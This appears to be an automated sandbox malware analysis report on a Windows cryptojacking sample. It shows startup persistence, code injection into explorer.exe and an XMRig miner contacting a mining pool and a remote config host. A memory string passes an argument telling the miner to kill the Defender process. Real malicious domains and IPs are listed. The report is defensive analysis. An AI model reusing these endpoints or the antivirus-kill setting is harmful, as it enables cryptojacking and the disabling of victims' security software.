                Source: explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zlzoxmx","computername":"284992","username":"user","gpu":"P5HMBCCT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":61,"type":"xmrig","status":1}
                Source: explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Managere
                Source: explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeQueries volume information: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe VolumeInformationJump to behavior
                Source: C:\Windows\explorer.exeCode function: 6_2_00000001403274D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00000001403274D0
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2237726271.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2269695496.0000000001311000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts31
                Windows Management Instrumentation
                111
                Scripting
                1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                OS Credential Dumping1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Windows Service
                1
                Windows Service
                1
                Abuse Elevation Control Mechanism
                Security Account Manager34
                System Information Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                1
                Scheduled Task/Job
                512
                Process Injection
                1
                Obfuscated Files or Information
                NTDS341
                Security Software Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd2
                Registry Run Keys / Startup Folder
                1
                Scheduled Task/Job
                1
                Software Packing
                LSA Secrets2
                Process Discovery
                SSHKeylogging4
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                Cached Domain Credentials161
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574031 Sample: file.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 41 woo097878781.win 2->41 43 pool.hashvault.pro 2->43 51 Suricata IDS alerts for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 9 other signatures 2->57 9 file.exe 6 2->9         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\WindosCPUsystem.exe, PE32+ 9->33 dropped 35 C:\...\WindosCPUsystem.exe:Zone.Identifier, ASCII 9->35 dropped 37 C:\Users\user\AppData\...\WindosCPUsystem.vbs, ASCII 9->37 dropped 73 Drops VBS files to the startup folder 9->73 75 Encrypted powershell cmdline option found 9->75 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->77 79 4 other signatures 9->79 13 aspnet_compiler.exe 1 9->13         started        17 wscript.exe 1 9->17         started        19 powershell.exe 23 9->19         started        signatures6 process7 file8 39 C:\Users\user\AppData\...\orupcopicsyv.sys, PE32+ 13->39 dropped 81 Injects code into the Windows Explorer (explorer.exe) 13->81 83 Modifies the context of a thread in another process (thread injection) 13->83 85 Sample is not signed and drops a device driver 13->85 21 explorer.exe 13->21         started        87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->87 25 WindosCPUsystem.exe 2 17->25         started        89 Loading BitLocker PowerShell Module 19->89 27 WmiPrvSE.exe 19->27         started        29 conhost.exe 19->29         started        signatures9 process10 dnsIp11 45 192.168.0.100, 4444, 49713, 49772 unknown unknown 21->45 47 woo097878781.win 154.216.20.243, 443, 49705, 49707 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 21->47 49 pool.hashvault.pro 37.203.243.102, 3333, 49704 DAPLDATAPLANETLtdRU Russian Federation 21->49 59 System process connects to network (likely due to code injection or exploit) 21->59 61 Query firmware table information (likely to detect VMs) 21->61 63 Found strings related to Crypto-Mining 21->63 31 aspnet_compiler.exe 21->31         started        65 Multi AV Scanner detection for dropped file 25->65 67 Machine Learning detection for dropped file 25->67 69 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->69 71 4 other signatures 25->71 signatures12 process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe24%ReversingLabs
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\WindosCPUsystem.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys5%ReversingLabs
                C:\Users\user\AppData\Roaming\WindosCPUsystem.exe24%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://woo097878781.win/66/api/endpoint.php0%Avira URL Cloudsafe
                https://woo097878781.win/P.txt--cinit-kill-targets=MsMpEng.exe--cinit-api=https://woo097878781.win/60%Avira URL Cloudsafe
                https://woo097878781.win/P.txtZ0%Avira URL Cloudsafe
                https://woo097878781.win0%Avira URL Cloudsafe
                https://woo097878781.win/66/api/endpoint.phpProvider0%Avira URL Cloudsafe
                https://woo097878781.win/P.txt0%Avira URL Cloudsafe
                http://schemas.micr0%Avira URL Cloudsafe
                https://woo097878781.win/P.txtEMP0%Avira URL Cloudsafe
                https://woo097878781.winxe0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                pool.hashvault.pro
                37.203.243.102
                truefalse
                  high
                  woo097878781.win
                  154.216.20.243
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://woo097878781.win/66/api/endpoint.phptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://woo097878781.win/P.txttrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://stackoverflow.com/q/14436606/23354file.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/mgravell/protobuf-netJfile.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpfalse
                          high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://woo097878781.win/P.txt--cinit-kill-targets=MsMpEng.exe--cinit-api=https://woo097878781.win/6explorer.exe, 00000006.00000002.3378093722.0000000001286000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netfile.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpfalse
                                      high
                                      http://schemas.micrWindosCPUsystem.exe, 00000009.00000002.2754655191.00000227AACEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://woo097878781.winexplorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/mgravell/protobuf-netifile.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://woo097878781.win/P.txtZexplorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251273544.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://stackoverflow.com/q/11564914/23354;file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            https://stackoverflow.com/q/2152978/23354file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpfalse
                                              high
                                              https://woo097878781.win/P.txtEMPexplorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2236864354.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251273544.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811156999.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://xmrig.com/docs/algorithmsexplorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2171532533.000001FA9F501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171532533.000001FA9F501000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://woo097878781.win/66/api/endpoint.phpProviderexplorer.exe, 00000006.00000002.3378093722.0000000001249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://woo097878781.winxeexplorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          37.203.243.102
                                                          pool.hashvault.proRussian Federation
                                                          44964DAPLDATAPLANETLtdRUfalse
                                                          154.216.20.243
                                                          woo097878781.winSeychelles
                                                          135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                          IP
                                                          192.168.0.100
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1574031
                                                          Start date and time:2024-12-12 20:35:10 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 23s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:12
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:file.exe
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.mine.winEXE@14/9@2/3
                                                          EGA Information:
                                                          • Successful, ratio: 33.3%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target aspnet_compiler.exe, PID 1012 because it is empty
                                                          • Execution Graph export aborted for target aspnet_compiler.exe, PID 5628 because there are no executed function
                                                          • Execution Graph export aborted for target explorer.exe, PID 6760 because there are no executed function
                                                          • Execution Graph export aborted for target powershell.exe, PID 6696 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: file.exe
                                                          TimeTypeDescription
                                                          14:36:13API Interceptor16x Sleep call for process: powershell.exe modified
                                                          14:36:18API Interceptor2x Sleep call for process: aspnet_compiler.exe modified
                                                          20:36:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37.203.243.102file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                            file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                              lokigod.exeGet hashmaliciousXmrigBrowse
                                                                xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                  154.216.20.243SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                        file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                            https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                              https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                https://estacionar-replonline.net/galicia/?fbclid=PAZXh0bgNhZW0BMAABpjGet hashmaliciousUnknownBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  pool.hashvault.profile.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                  • 37.203.243.102
                                                                                  file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 37.203.243.102
                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                  • 5.188.137.200
                                                                                  lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                  • 37.203.243.102
                                                                                  xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                  • 5.188.137.200
                                                                                  0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                                                                                  • 45.76.89.70
                                                                                  prog.exeGet hashmaliciousXmrigBrowse
                                                                                  • 95.179.241.203
                                                                                  bypass.exeGet hashmaliciousXmrigBrowse
                                                                                  • 95.179.241.203
                                                                                  loader.exeGet hashmaliciousXmrigBrowse
                                                                                  • 142.202.242.43
                                                                                  7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                                                                  • 45.76.89.70
                                                                                  woo097878781.winSJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                  • 154.216.20.243
                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                  • 154.216.20.243
                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                  • 154.216.20.243
                                                                                  file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 154.216.20.243
                                                                                  file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                  • 154.216.20.243
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  SKHT-ASShenzhenKatherineHengTechnologyInformationCojew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.207.239.54
                                                                                  Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
